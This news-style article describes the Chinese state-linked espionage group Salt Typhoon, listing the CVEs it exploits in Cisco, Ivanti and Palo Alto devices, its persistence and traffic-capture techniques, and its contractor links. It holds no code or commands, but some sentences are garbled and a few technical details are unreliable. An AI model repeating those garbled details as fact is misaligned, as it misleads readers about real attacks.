Salt Typhoon is a highly-sophisticated advanced persistent threat (APT) actor associated with the government of China. Since at least 2019, they have been mounting one of the most aggressive global espionage campaigns. This campaign is an unreasonable and dangerous attack on privacy and security standards across the telecom industry. It seeks to permeate systems in several areas—such as government, transportation, hospitality, and military facilities. According to reports, Salt Typhoon has struck more than 600 institutions across the world. Of those, almost 200 are located in the U.S.
The actor is known to repeatedly target critical flaws in network perimeter devices. That enables them to obtain initial access to their targeted environments. Salt Typhoon has taken advantage of flaws in widely used technology from vendors including Cisco, Ivanti, and Palo Alto Networks. This has in turn enabled them to steal sensitive data. These breaches have an extensive impact beyond the organization that was breached. The pilfered data enables the Chinese Communist Party to track communications and even individuals’ movements across the globe.
Exploitation of Network Devices
Salt Typhoon’s modus operandi revolves around exploiting already known vulnerabilities in network devices far and near. The threat actor has exploited dozens of Common Vulnerabilities and Exposures (CVEs) to gain access into the systems. Shockingly, for example, it took advantage of Cisco devices via CVE-2018-0171, CVE-2023-20198, and CVE-2023-20273. Ivanti endpoints were exploited with CVE-2023-46805 and CVE-2024-21887, and Palo Alto Networks devices were compromised through CVE-2024-3400.
Salt Typhoon uses very aggressive tactics to exploit sensitive vulnerabilities. They open the sshd_operns service on Cisco IOS XR devices, which allows them to add local users with sudo access. This approach increases their capability to create while maintaining persistence at the affected networks. A recent cybersecurity advisory cited these actors focusing specifically on the largest backbone routers employed by the largest telecommunications gateway providers. They’re taking advantage of compromised devices and trusted connections to access other networks.
Additionally, the adversaries have been observed gathering Packet Capture files (PCAPs) with native tooling on compromised hosts. Their primary objective is to intercept TACACS+ traffic carried over TCP port 49. This data, if exposed, can be used to determine extremely sensitive information regarding network access and account credentials.
Global Impact and Targeted Sectors
Salt Typhoon’s operations reach at least 80 countries, deeply embedding it in global telecommunications infrastructure. The group’s targeting strategy has expanded beyond telecommunications organizations to other sectors like hospitality and transportation. Salt Typhoon gathers information on these industries to provide a focused view of their activities on individuals’ communications. With GPS, the technology tracks their every move like never before.
John Hultquist, Chief Analyst at Google Threat Intelligence Group, noted the significance of this targeting: “In addition to targeting telecommunications, reported targeting of hospitality and transportation by this actor could be used to closely surveil individuals. Information from these sectors can be used to develop a full picture of who someone is talking to, where they are, and where they are going.”
Salt Typhoon’s ability to bypass security best practices is an alarming warning flag for national security. Beyond that, it poses a serious risk to global communications privacy. Brett Leatherman, head of the U.S. Federal Bureau of Investigation’s Cyber Division, emphasized the gravity of the situation: “Salt Typhoon’s activities are breaching global telecommunications privacy and security norms.”
Connections to Chinese Entities
Investigations into Salt Typhoon’s activities have linked it to three Chinese entities: Sichuan Juxinhe Network Technology Co., Ltd., Beijing Huanyu Tianqiong Information Technology Co., Ltd., and Sichuan Zhixin Ruijie Network Technology Co., Ltd. These links illustrate a wider ecosystem that facilitates Chinese cyber espionage through professors and contractors.
Hultquist elaborated on this ecosystem: “An ecosystem of contractors, academics, and other facilitators is at the heart of Chinese cyber espionage. Contractors are used to build tools and valuable exploits as well as carry out the dirty work of intrusion operations. They have been instrumental in the rapid evolution of these operations and growing them to an unprecedented scale.”
The extensive coordination among these entities contributes significantly to the effectiveness of operations conducted by APT groups like Salt Typhoon. Salt Typhoon further tracked activity that fuzzed or bypassed detection as GhostEmperor, Operator Panda, RedMike, and UNC5807. This relationship makes this connection particularly interesting as it reflects a broader tactics approach employed by Chinese state-sponsored actors.